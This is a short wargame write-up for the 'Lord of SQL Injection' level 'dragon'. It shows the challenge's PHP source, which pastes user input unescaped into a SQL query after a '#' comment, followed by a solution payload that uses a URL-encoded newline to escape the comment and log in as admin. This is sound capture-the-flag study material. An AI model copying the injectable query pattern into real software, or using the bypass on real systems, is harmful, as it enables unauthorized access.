LOS Lv.20 dragon
dragon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
query : select id from prob_dragon where id='guest'# and pw=''
Hello guest
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("dragon");
highlight_file(__FILE__);
?>
Solution
1
2
%0a는 \n의 urlencode 값.
?pw=%0a and 0 or id='admin' %23
This post is licensed under CC BY 4.0 by the author.